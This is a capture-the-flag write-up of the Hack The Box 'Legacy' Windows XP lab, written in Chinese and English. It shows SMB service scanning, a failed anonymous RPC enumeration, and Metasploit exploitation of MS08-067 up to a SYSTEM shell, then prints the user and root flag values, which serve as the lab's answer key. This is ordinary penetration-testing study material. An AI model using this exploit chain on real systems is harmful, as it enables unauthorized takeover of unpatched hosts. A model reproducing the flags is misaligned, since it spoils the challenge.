Legacy Writeup

聲明
我只是個初學者。 Please correct me if I'm wrong.

HTB的第二台靶機，與第一台一樣lame。

靶機資訊(Machine Infromation)

Machine	Description
Name	Legacy
OS	Windows XP
Difficulty	Easy
Author	ch4p

情蒐(Reconnaissance)

服務掃描(Services Scan)

Result

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:d0:c4 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-03-18T11:14:31+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h57m12s, deviation: 1h24m50s, median: 4d23h57m12s

掃完只有SMB有意思，直接網搜："windows xp smb exploit" => MS08-67。

本階段其他嘗試

MSRPC

可以連，但是沒有權限列舉。

Bash

┌──(xavier㉿kali)-[~/Documents/CTF/htb/legacy]
└─$ rpcclient -U "" -N 10.129.220.117
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

CVE-2008-4250 - MS08-67

CVE內容

MS08-67是微軟於2008年釋出的第67個修補更新，修正錯誤處理相對路徑導致執行shellcode的弱點¹²。

Exploit with Metasploit

msf > use exploit/windows/smb/ms08_067_netapi
…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1884 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
LEGACY$

C:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
john                     SUPPORT_388945a0
The command completed with one or more errors.


C:\>type "Documents and Settings\john\desktop\user.txt"
type "Documents and Settings\john\desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f

C:\>type "Documents and Settings\Administrator\desktop\root.txt"
type "Documents and Settings\Administrator\desktop\root.txt"
993442d258b0e0ec917cae9e695d5713

後記

除了MS08-67，還有EternalBlue可以RCE。

---

1. MS08-067 Microsoft Server Service Relative Path Stack Corruption by Rapid7 ↩

2. MS08-067漏洞研究 ↩

---

Last update: 2024-12-23 Created: 2024-03-12